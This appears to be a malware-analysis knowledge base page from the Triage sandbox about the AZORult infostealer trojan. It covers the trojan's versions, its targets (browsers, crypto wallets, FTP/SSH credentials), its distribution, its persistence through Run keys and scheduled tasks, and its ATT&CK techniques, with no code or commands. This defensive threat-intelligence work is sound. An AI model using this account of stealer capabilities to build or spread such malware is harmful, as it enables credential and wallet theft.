Triage: Knowledge Base

AZORult's Year Activity

-

-

AZORult in Triage

Description

AZORult is an infostealer trojan which has been used in the wild since early 2016. It has received multiple updates over the years, and is still being actively used in 2020. Initial versions were created in Delphi; later versions are now written in C++.

Initial versions of the family featured no persistence mechanism, and deleted itself from the infected system after harvesting and exfiltrating useful personal data. Later updates have added persistence mechanisms, including via Scheduled Tasks and registry Run keys.

It can steal data from a range of sources, including:

  • Various web browsers
  • Email clients
  • Cryptocurrency wallets (Bitcoin, Electrum, Etherium, etc.)
  • Common communication software (Telegram, Skype, Pidgin Messenger etc.)
  • Steam game client
  • FTP/SSH credentials (FileZilla, WinSCP, etc.)

Samples are often distributed via malicious Office documents, though other methods including fake VPN downloads have also been observed.

AZORult++

At the end of 2018 the main seller of AZORult announced the discontinuation of the trojan’s development and closed sales. However in early 2019 a new version appeared online written in C++ rather than the original Delphi, apparently created by part of the initial development team. This version is sometimes referred to as AZORult++.

This newer version includes some additional features over the original, such as Remote Desktop Connection (RDP) to infected machines.

Common Behaviour

C2 Extraction

Triage processes the payload during analysis to extract the C2 URL/IP, making it visible even if execution fails or the C2 is now inactive.

Example C2 extraction (https://tria.ge/reports/200403-ndtpt6rnka/behavioral1)

Persistence

Over time some persistence methods have been added to versions of AZORult. This generally includes a Run key in registry pointing to a loader script, either locally or remotely:

Run key pointing to local VBS file

Run key pointing to remote script on Pastebin

Some samples make use of tools like schtasks to create Scheduled Tasks to launch the loader script:

Schtasks.exe used to gain persistence

  • Excel spawns unexpected process (MSHTA.exe)
  • MSHTA and Powershell make network requests
  • Persistence via Run keys and Scheduled Tasks
  • Uses Pastebin for payload download (depends on infection method)

External References

1 Azorult on Malpedia

Listing of relevant open-source blogposts, yara rules etc.

2 Azorult on Mitre ATT&CK

Details of all TTPs associated with the family's activity.

Tactics, Techniques, and Procedures

Defense Evasion: Access Token Manipulation

Defense Evasion: Deobfuscate/Decode Files or Information

Discovery: File and Directory Discovery

Defense Evasion: Indicator Removal on Host

Command and Control: Remote File Copy

Discovery: Process Discovery

Defense Evasion: Process Injection

Discovery: Query Registry

Collection: Screen Capture

Discovery: System Information Discovery

Discovery: System Network Configuration Discovery

Discovery: System Owner/User Discovery

Discovery: System Time Discovery

Contents